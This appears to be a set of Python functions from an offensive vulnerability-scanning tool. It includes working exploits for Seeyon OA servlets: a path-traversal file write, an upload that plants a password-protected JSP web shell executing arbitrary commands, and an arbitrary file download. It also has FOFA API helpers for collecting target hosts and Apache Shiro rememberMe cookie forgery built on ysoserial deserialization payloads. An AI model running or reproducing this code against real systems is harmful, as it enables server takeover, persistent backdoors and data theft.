async def prove(self): await self.get_url() if self.base_url: table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6' test_file = 'test' + str(random.randint(100000, 999999)) + '.txt' base64_file = str( base64encode( '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format( test_file), table)) url = self.base_url + 'seeyon/htmlofficeservlet' async with ClientSession() as session: async with session.get(url=url) as response: if response != None: text = await response.text() if 'DBSTEP V3.0' in text: data = '''DBSTEP V3.0 355 0 22 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format( base64_file) async with session.post(url=url, data=data) as response2: # print(self.base_url + 'seeyon/' + test_file) await asyncio.sleep(1) url1 = self.base_url + 'seeyon/' + test_file async with session.get(url=url1) as response2: if response2 != None: text2 = await response2.text() if 'this is a test for me' in text2: self.flag = 1 self.res.append({ "info": url1, "key": 'seeyon getshell' })
async def upload(self): await self.get_url() if self.base_url: table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6' test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp' base64_file = str( base64encode( '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format( test_file), table)) url = self.base_url + 'seeyon/htmlofficeservlet' async with ClientSession() as session: async with session.get(url=url) as response: if response != None: text = await response.text() if 'DBSTEP V3.0' in text: data = '''DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2''' async with session.post(url=url, data=data) as response: await asyncio.sleep(1) url1 = self.base_url + 'seeyon/' + test_file async with session.get(url=url1) as response1: if response1 != None: text1 = await response1.text() if ':-)' in text1: self.flag = 1 self.res.append({ "info": url1 + '?pwd=test12345&cmd=whoami', "key": 'seeyon getshell' })
async def _fofa_api(search, page, flag = True): ''' https://fofa.so/api#auth ''' url_login = '******' try: email = conf['fofa_api']['email'] key = conf['fofa_api']['token'] except KeyError: sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf.")) if flag: logger.sysinfo("Using fofa api...") search = str(base64encode(search)) async with ClientSession() as session: for p in range(1,page+1): logger.debug("Find fofa url of %d page..." % int(p)) async with session.post(url=url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) as response: if response !=None: if int(response.status) == 401: sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service.")) else: res = await response.text() if res !=None: res_json = json.loads(res) if res_json["error"] is None: if len(res_json.get('results')) == 0: break for item in res_json.get('results'): logger.debug("Fofa Found: %s" % item[0]) yield item[0]
def _fofa_api(search, page, flag = True): ''' https://fofa.so/api#auth ''' url_login = '******' result = [] try: email = conf['config']['fofa_api']['email'] key = conf['config']['fofa_api']['token'] except KeyError: sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf.")) if flag: logger.sysinfo("Using fofa api...") search = str(base64encode(bytes(search, 'utf-8')),'utf-8') for p in range(1,page+1): logger.debug("Find fofa url of %d page..." % int(p)) res = mycurl('post',url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) if res !=None : if int(res.status_code) == 401: sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service.")) else: res_json = json.loads( res.text) if res_json["error"] is None: for item in res_json.get('results'): logger.debug("Fofa Found: %s" % item[0]) result.append(item[0]) return result
async def download(self): await self.get_url() if self.base_url: fn = self.parameter['file'] table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6' base64_file = str(base64encode(fn, table)) url = self.base_url + 'seeyon/officeservlet' headers = {'Content-Type': 'application/x-www-form-urlencoded'} async with ClientSession() as session: async with session.get(url=url) as response: if response != None: text = await response.text() if 'DBSTEP V3.0' in text: data = '''DBSTEP V3.0 331 0 0 \r\ncurrentUserId=ziCEz4eEz4KuzUK3ziKGwUdszg66\r\nRECORDID=wLKhwLK6\r\nCREATEDATE=wLShwUgsP4o3Pg66\r\noriginalFileId=wV66\r\nneedReadFile=NrMGyV66\r\noriginalCreateDate=wLShwUgsP4o3Pg66\r\nOPTION=LKDxOWOWLlxwVlOW\r\nCOMMAND=BSTLOlMSOCQwOV66\r\nTEMPLATE={}\r\naffairMemberId=wV66\r\naffairMemberName=OKlzLs66'''.format( base64_file) async with session.post( url=url, data=data, headers=headers) as response: if response != None: text = await response.text() if '<res-type>javax.sql.DataSource</res-type>' in text: self.flag = 1 self.res.append({ "info": url, "key": 'seeyon download' })
def get_aes_cipher_cookie(self, text, key): BS = AES.block_size pad = lambda s: s + ( (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64decode(key), mode, iv) file_body = pad(base64decode(text)) base64_ciphertext = base64encode(iv + encryptor.encrypt(file_body)) return "rememberMe=" + str(base64_ciphertext)
def encode_rememberme(self, command, key): popen = subprocess.Popen([ 'java', '-jar', 'tool/ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command ], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ( (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64encode(iv + encryptor.encrypt(file_body)) return "rememberMe=" + str(base64_ciphertext)